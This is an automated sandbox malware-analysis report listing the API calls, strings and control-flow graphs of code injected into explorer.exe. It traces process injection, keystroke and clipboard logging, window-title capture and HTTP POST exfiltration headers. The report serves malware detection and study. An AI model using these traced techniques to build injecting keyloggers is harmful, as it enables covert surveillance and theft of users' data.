3099caa 170->175 171->172 176 3099c39-3099c3c 172->176 177 3099c32-3099c37 172->177 173->174 174->166 175->125 177->165
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003098000.00000040.80000000.00040000.00000000.sdmp, Offset: 03098000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3098000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6f4466b2c9bb0727e077ba47d382605d2602b882d85586a3806476c8633524c8
                                                                        • Instruction ID: 1be0114264494ae08c0391719ba061df5446747c64d94055072b610deff3537e
                                                                        • Opcode Fuzzy Hash: 6f4466b2c9bb0727e077ba47d382605d2602b882d85586a3806476c8633524c8
                                                                        • Instruction Fuzzy Hash: 485127B1A462525AFF20CA78CD807B5B7D8EB42230B1C077EC5E6C73C6E7985806E760
                                                                        Function 0309276D Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 309276d-309277f OpenFileMappingA 179 3092781-3092791 MapViewOfFile 178->179 180 3092794-3092798 178->180 179->180
                                                                        APIs
                                                                        • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 03092777
                                                                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,030910FE), ref: 03092789
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: File$MappingOpenView
                                                                        • String ID:
                                                                        • API String ID: 3439327939-0
                                                                        • Opcode ID: 432b158ff54ef1501b70044838f3929d0c31760967a9896d3dd3ac720691665b
                                                                        • Instruction ID: 20a6ab9357cc80d3f6a490bd3e2a8b34cc028ebd6190c517475d7fb0cf061704
                                                                        • Opcode Fuzzy Hash: 432b158ff54ef1501b70044838f3929d0c31760967a9896d3dd3ac720691665b
                                                                        • Instruction Fuzzy Hash: A0D01736702231BBE7746A7B6C0CF83AEDDEFC6AE1B020026B50DD2140D6648810C6F0
                                                                        Function 0309275A Relevance: 3.0, APIs: 2, Instructions: 8fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 181 309275a-309276c UnmapViewOfFile CloseHandle
                                                                        APIs
                                                                        • UnmapViewOfFile.KERNEL32(00000000,?,0309129A,00000001), ref: 0309275E
                                                                        • CloseHandle.KERNELBASE(?,?,0309129A,00000001), ref: 03092765
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFileHandleUnmapView
                                                                        • String ID:
                                                                        • API String ID: 2381555830-0
                                                                        • Opcode ID: 754826d17893706b8000f0ec4cad5785ef723ee40c510e060ddaf607bdf90a29
                                                                        • Instruction ID: 8731f499047776ab4aae619f2e79d353c3f6fd0d4fdf0951262ab211198626af
                                                                        • Opcode Fuzzy Hash: 754826d17893706b8000f0ec4cad5785ef723ee40c510e060ddaf607bdf90a29
                                                                        • Instruction Fuzzy Hash: 70B0123A40703097C3243734781C9DB3F18FEC922130701C6F14D81008472C08018EE8
                                                                        Function 03092A09 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 182 3092a09-3092a19 GetProcessHeap RtlAllocateHeap
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: 5b3eff69bf06d758c4434b4b2c511dba51822f26f25ef5f3a6b294ab5203d3ad
                                                                        • Instruction ID: 95f09a7fb9299f640903f6bc59dfb298572e9f4141b3b6f83b59e169f2cb5e79
                                                                        • Opcode Fuzzy Hash: 5b3eff69bf06d758c4434b4b2c511dba51822f26f25ef5f3a6b294ab5203d3ad
                                                                        • Instruction Fuzzy Hash: CFA002B56512006BDE5477E4A91EF167758B7C4701F0145857296C50849D7954448F21

                                                                        Non-executed Functions

                                                                        Function 030918BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 03092724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,030929F3,-00000001,0309128C), ref: 03092731
                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 030918F4
                                                                        • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 0309192F
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 030919BF
                                                                        • RtlMoveMemory.NTDLL(00000000,03093638,00000016), ref: 030919E6
                                                                        • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 03091A0E
                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 03091A1E
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 03091A38
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 03091A40
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091A4E
                                                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091A55
                                                                        • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 03091A6B
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 03091A72
                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091A88
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091AB2
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 03091AC5
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091ACC
                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091AD3
                                                                        • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 03091AE7
                                                                        • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 03091AFE
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B0B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B11
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 03091B17
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 03091B1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                        • String ID: 0-vP,v$atan$ntdll$opera_shared_counter
                                                                        • API String ID: 1066286714-2395699481
                                                                        • Opcode ID: 24c2200e27abb652ca1bfd4c75f1b7e4ce00125b251973345659544986cc25f9
                                                                        • Instruction ID: 3f169ad1e6b2d46940cd7683615a7c7166f3c54d3bf143f9de22ae338024f98f
                                                                        • Opcode Fuzzy Hash: 24c2200e27abb652ca1bfd4c75f1b7e4ce00125b251973345659544986cc25f9
                                                                        • Instruction Fuzzy Hash: BA61BD35206306AFEB14EF25CC84E6BBBEDFB89750F05055AF999D3241D774D8048BA2
                                                                        Function 03092799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 030927B5
                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 030927CD
                                                                        • lstrlen.KERNEL32(?,00000000), ref: 030927D5
                                                                        • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 030927E0
                                                                        • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 030927FA
                                                                        • wsprintfA.USER32 ref: 03092811
                                                                        • CryptDestroyHash.ADVAPI32(?), ref: 0309282A
                                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 03092834
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                        • String ID: %02X
                                                                        • API String ID: 3341110664-436463671
                                                                        • Opcode ID: 2bd97d09e0d35ac86c0825777d4c038cde02dcb449ad17eefc287650144abd4e
                                                                        • Instruction ID: dc614c372e460c696764faba9b815507c107d913590982b1c8d04692e568c61e
                                                                        • Opcode Fuzzy Hash: 2bd97d09e0d35ac86c0825777d4c038cde02dcb449ad17eefc287650144abd4e
                                                                        • Instruction Fuzzy Hash: AD114975902108BFEB11AB99EC89EEFBBBCFB88301F1140A6F644E2110D7354E159B60
                                                                        Function 0309162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetKeyboardState.USER32(?), ref: 03091652
                                                                        • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 0309167A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: KeyboardStateUnicode
                                                                        • String ID:
                                                                        • API String ID: 3453085656-3916222277
                                                                        • Opcode ID: db6e4163524f0b9405c24a2deb0321f194a60a75eca83da9217f2fe9946ced5a
                                                                        • Instruction ID: 6f6c1c5152eb7f259ec537650696eb60b86ac31bb919418057ca2fcda33f57fc
                                                                        • Opcode Fuzzy Hash: db6e4163524f0b9405c24a2deb0321f194a60a75eca83da9217f2fe9946ced5a
                                                                        • Instruction Fuzzy Hash: F2016D36E0221A9AEF38DF55D945BFBB3BCAF85B00F0C445BE901E2150D734E5459AA1
                                                                        Function 030913AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlZeroMemory.NTDLL(03095013,0000001C), ref: 030913C8
                                                                        • VirtualQuery.KERNEL32(030913AE,?,0000001C), ref: 030913DA
                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 0309140B
                                                                        • GetCurrentProcessId.KERNEL32(00000004), ref: 0309141C
                                                                        • wsprintfA.USER32 ref: 03091433
                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 03091448
                                                                        • GetLastError.KERNEL32 ref: 0309144E
                                                                        • RtlInitializeCriticalSection.NTDLL(0309582C), ref: 03091465
                                                                        • Sleep.KERNEL32(000001F4), ref: 03091489
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 030914A6
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030914AF
                                                                        • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 030914D0
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030914D3
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 030914F1
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 0309150D
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03091514
                                                                        • RtlExitUserThread.NTDLL(00000000), ref: 0309152A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                        • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                        • API String ID: 3628807430-1779906909
                                                                        • Opcode ID: e5f9369dae0c920649bf49eada96dc06e3f086588248543c490ed9bd074d340a
                                                                        • Instruction ID: cb98a0e73468a1b141a722292b3e2886a11ffbbf643ff20771137694f07f7f31
                                                                        • Opcode Fuzzy Hash: e5f9369dae0c920649bf49eada96dc06e3f086588248543c490ed9bd074d340a
                                                                        • Instruction Fuzzy Hash: 0141A378702309FBEF15FB669C19A5F7BACFBC5740B02445BF5468A245CB7998009FA0
                                                                        Function 030916B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • RtlEnterCriticalSection.NTDLL(0309582C), ref: 030916C4
                                                                        • lstrlenW.KERNEL32 ref: 030916DB
                                                                        • lstrlenW.KERNEL32 ref: 030916F3
                                                                        • wsprintfW.USER32 ref: 03091743
                                                                        • GetForegroundWindow.USER32 ref: 0309174E
                                                                        • GetWindowTextW.USER32(00000000,03095850,00000800), ref: 03091767
                                                                        • GetClassNameW.USER32(00000000,03095850,00000800), ref: 03091774
                                                                        • lstrcmpW.KERNEL32(03095020,03095850), ref: 03091781
                                                                        • lstrcpyW.KERNEL32(03095020,03095850), ref: 0309178D
                                                                        • wsprintfW.USER32 ref: 030917AD
                                                                        • lstrcatW.KERNEL32 ref: 030917C6
                                                                        • RtlLeaveCriticalSection.NTDLL(0309582C), ref: 030917D3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                        • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                        • API String ID: 2651329914-3371406555
                                                                        • Opcode ID: a70b32f1bff09c4bf1b1336f40914fd45a30d3f7fd4762e24d8df2a093d059fe
                                                                        • Instruction ID: 84412fefc695e8614395ebdb414fc9d013a8420e8c87ac6c04b19098eaec2d96
                                                                        • Opcode Fuzzy Hash: a70b32f1bff09c4bf1b1336f40914fd45a30d3f7fd4762e24d8df2a093d059fe
                                                                        • Instruction Fuzzy Hash: E021DB3860720ABBFB26B726EC8896F7BBCFBC27547050097F45156119DA198C01ABE5
                                                                        Function 030925F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32 ref: 03092603
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0309260B
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0309261B
                                                                        • Thread32First.KERNEL32(00000000,0000001C), ref: 03092629
                                                                        • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 03092648
                                                                        • SuspendThread.KERNEL32(00000000), ref: 03092658
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092667
                                                                        • Thread32Next.KERNEL32(00000000,0000001C), ref: 03092677
                                                                        • CloseHandle.KERNEL32(00000000), ref: 03092682
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1467098526-0
                                                                        • Opcode ID: 075dd1e85d8b2a2e01e3a1d21722cf1165dac08c563a2e5b300d30864460b80c
                                                                        • Instruction ID: d6d567d979728d11eabb34a43d224bd7fd45969740ae3eda7b582bc5ca638ced
                                                                        • Opcode Fuzzy Hash: 075dd1e85d8b2a2e01e3a1d21722cf1165dac08c563a2e5b300d30864460b80c
                                                                        • Instruction Fuzzy Hash: A4115139406304EBEB01EF60E85CA6FBBA8FB84705F05099BF58592144D73889159FA2
                                                                        Function 030920A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 295 30920a1-30920fc call 309240f call 3092a09 call 309298a call 30924cc 304 30920fe-3092115 295->304 305 3092117-3092123 295->305 308 3092127-3092129 304->308 305->308 309 30923fd-309240c call 30929eb 308->309 310 309212f-3092166 RtlZeroMemory 308->310 314 309216c-3092187 310->314 315 30923f5-30923fc 310->315 316 30921b9-30921cb 314->316 317 3092189-309219a call 309243d 314->317 315->309 322 30921cf-30921d1 316->322 323 30921ad 317->323 324 309219c-30921ab 317->324 326 30923e2-30923e8 322->326 327 30921d7-3092233 call 309288d 322->327 325 30921af-30921b7 323->325 324->325 325->322 329 30923ea-30923ec call 30929eb 326->329 330 30923f1 326->330 335 3092239-309223e 327->335 336 30923db 327->336 329->330 330->315 337 3092258-3092286 call 3092a09 wsprintfW 335->337 338 3092240-3092251 335->338 336->326 341 3092288-309228a 337->341 342 309229f-30922b6 337->342 338->337 343 309228b-309228e 341->343 348 30922b8-30922ee call 3092a09 wsprintfW 342->348 349 30922f5-309230f 342->349 344 3092299-309229b 343->344 345 3092290-3092295 343->345 344->342 345->343 347 3092297 345->347 347->342 348->349 353 30923b8-30923ce call 30929eb 349->353 354 3092315-3092328 349->354 362 30923d0-30923d2 call 30929eb 353->362 363 30923d7 353->363 354->353 357 309232e-3092344 call 3092a09 354->357 364 3092346-3092351 357->364 362->363 363->336 366 3092353-3092360 call 30929ce 364->366 367 3092365-309237c 364->367 366->367 371 309237e 367->371 372 3092380-309238d 367->372 371->372 372->364 373 309238f-3092393 372->373 374 30923ad-30923b4 call 30929eb 373->374 375 3092395 373->375 374->353 376 3092395 call 30929bd 375->376 378 309239a-30923a7 RtlMoveMemory 376->378 378->374
                                                                        APIs
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                          • Part of subcall function 0309298A: lstrlen.KERNEL32(03094FE2,?,00000000,00000000,030920DD,75918A60,03094FE2,00000000), ref: 03092992
                                                                          • Part of subcall function 0309298A: MultiByteToWideChar.KERNEL32(00000000,00000000,03094FE2,00000001,00000000,00000000), ref: 030929A4
                                                                          • Part of subcall function 030924CC: RtlZeroMemory.NTDLL(?,00000018), ref: 030924DE
                                                                        • RtlZeroMemory.NTDLL(?,0000003C), ref: 03092139
                                                                        • wsprintfW.USER32 ref: 03092272
                                                                        • wsprintfW.USER32 ref: 030922DD
                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 030923A7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                        • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                        • API String ID: 4204651544-1701262698
                                                                        • Opcode ID: 10cd1137b21299d640be6811cc71e9b5360a0b717cd8c14098db3f688186e358
                                                                        • Instruction ID: c99089e0e250c2c09ea691a0d37878a4ee8324388b7e5a50f8fa6396377310a5
                                                                        • Opcode Fuzzy Hash: 10cd1137b21299d640be6811cc71e9b5360a0b717cd8c14098db3f688186e358
                                                                        • Instruction Fuzzy Hash: FEA18D7560A308AFEB50EF68D884A6FBBECFB89340F04082EF585C7251DB34D9049B56
                                                                        Function 030912AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 380 30912ae-30912bf 381 30912c5-30912c7 380->381 382 30913a6-30913ad 380->382 381->382 383 30912cd-30912cf 381->383 384 30912d4 call 30929bd 383->384 385 30912d9-30912fc lstrlen call 3092a09 384->385 388 309136e-3091377 call 30929eb 385->388 389 30912fe-3091327 call 3092841 RtlZeroMemory 385->389 394 3091379-309137d 388->394 395 309139d-30913a5 call 30929ae 388->395 396 3091329-309134f RtlMoveMemory call 3092569 389->396 397 3091353-3091369 RtlMoveMemory call 3092569 389->397 398 309137f-3091392 call 309255c PathMatchSpecA 394->398 395->382 396->389 406 3091351 396->406 397->388 407 309139b 398->407 408 3091394-3091397 398->408 406->388 407->395 408->398 409 3091399 408->409 409->395
                                                                        APIs
                                                                          • Part of subcall function 030929BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,030912D9,00000000,00000000,?,00000001), ref: 030929C7
                                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 030912DC
                                                                          • Part of subcall function 03092A09: GetProcessHeap.KERNEL32(00000008,0000A000,030910BF), ref: 03092A0C
                                                                          • Part of subcall function 03092A09: RtlAllocateHeap.NTDLL(00000000), ref: 03092A13
                                                                        • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0309138A
                                                                          • Part of subcall function 03092841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,03091119,00000001), ref: 03092850
                                                                          • Part of subcall function 03092841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,03091119,00000001), ref: 03092855
                                                                        • RtlZeroMemory.NTDLL(00000000,00000104), ref: 03091316
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 03091332
                                                                          • Part of subcall function 03092569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0309136E), ref: 03092591
                                                                          • Part of subcall function 03092569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0309259A
                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0309135F
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                        • String ID:
                                                                        • API String ID: 2993730741-0
                                                                        • Opcode ID: c0d52a75d80ed9591200087a7688a9ecd7e6a2f2aa74e4d1a351d11bdd14c050
                                                                        • Instruction ID: b43734e3ff2611a81987477027a9c7599dcc8f1545782ee53710edbc39b4ca36
                                                                        • Opcode Fuzzy Hash: c0d52a75d80ed9591200087a7688a9ecd7e6a2f2aa74e4d1a351d11bdd14c050
                                                                        • Instruction Fuzzy Hash: A721A578706306AFAB04EF28945447EB7EEBBC8600B04492FF895D7340DB34DC05AA66
                                                                        Function 03091581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 410 3091581-3091592 412 3091598-309159b 410->412 413 3091624-3091628 410->413 414 309159d-30915a0 412->414 415 30915a7-30915b3 GlobalLock 412->415 414->415 416 30915a2-30915a5 414->416 417 3091623 415->417 418 30915b5-30915b9 415->418 416->413 416->415 417->413 419 30915e9 418->419 420 30915bb-30915be 418->420 423 30915eb-30915f2 call 309293e 419->423 421 30915c0-30915c3 420->421 422 30915e4-30915e7 420->422 424 30915c5-30915e2 lstrlenW call 3092a09 lstrcatW 421->424 425 30915f4-30915fd call 3092724 421->425 422->423 423->425 424->425 432 309161b-3091622 GlobalUnlock 425->432 433 30915ff-3091608 lstrlenW 425->433 432->417 433->432 434 309160a-309160e 433->434 435 309160f call 30916b9 434->435 436 3091614-3091616 call 30929eb 435->436 436->432
                                                                        APIs
                                                                        • GlobalLock.KERNEL32(00000000), ref: 030915A9
                                                                        • lstrlenW.KERNEL32(00000000), ref: 030915C6
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 030915DC
                                                                        • lstrlenW.KERNEL32(00000000), ref: 03091600
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0309161C
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: Globallstrlen$LockUnlocklstrcat
                                                                        • String ID:
                                                                        • API String ID: 1114890469-0
                                                                        • Opcode ID: c08bd3143a1575c29fc0ef17a51a08cc241f3cb3fd9e8dee6e15e8a1c0e627af
                                                                        • Instruction ID: 3987f8e1d6672755f031ba4884092ea9ac45d4b51db3936e016f1de16092d020
                                                                        • Opcode Fuzzy Hash: c08bd3143a1575c29fc0ef17a51a08cc241f3cb3fd9e8dee6e15e8a1c0e627af
                                                                        • Instruction Fuzzy Hash: E501E93AF03106ABBE6DF7796C585BEA2EDAFC611070E0427E447D2314DE288C026650
                                                                        Function 03091BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 438 3091bbd-3091bd2 439 3091bd4 438->439 440 3091c06-3091c0e 438->440 441 3091bd6-3091c04 RtlMoveMemory 439->441 442 3091c69-3091c71 440->442 443 3091c10-3091c15 440->443 441->440 441->441 444 3091cb1 442->444 445 3091c73-3091c85 442->445 446 3091c64-3091c67 443->446 448 3091cb3-3091cb8 444->448 445->444 447 3091c87-3091ca4 LdrProcessRelocationBlock 445->447 446->442 449 3091c17-3091c2a LoadLibraryA 446->449 447->444 450 3091ca6-3091caa 447->450 451 3091cbb-3091cbd 449->451 452 3091c30-3091c35 449->452 450->444 453 3091cac-3091caf 450->453 451->448 454 3091c5c-3091c5f 452->454 453->444 453->447 455 3091c61 454->455 456 3091c37-3091c3b 454->456 455->446 457 3091c3d-3091c40 456->457 458 3091c42-3091c45 456->458 459 3091c47-3091c51 GetProcAddress 457->459 458->459 459->451 460 3091c53-3091c59 459->460 460->454
                                                                        APIs
                                                                        • RtlMoveMemory.NTDLL(?,?,?), ref: 03091BF4
                                                                        • LoadLibraryA.KERNEL32(?,03095848,00000000,00000000,75922EE0,00000000,030919B6,?,?,?,00000001,?,00000000), ref: 03091C1C
                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 03091C49
                                                                        • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 03091C9A
                                                                        Memory Dump Source
                                                                        • Source File: 00000010.00000002.4535447813.0000000003091000.00000040.80000000.00040000.00000000.sdmp, Offset: 03091000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_16_2_3091000_explorer.jbxd
                                                                        Similarity
                                                                        • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                        • String ID:
                                                                        • API String ID: 3827878703-0
                                                                        • Opcode ID: 3e2004b269e34dd4ee121584ab11494cfe91102d731b6eefacc3be41cfe4b7fb
                                                                        • Instruction ID: d0d15f9aebb7b92f64747209768ee65537e2f4c9dd9c145b02593eadf429f053
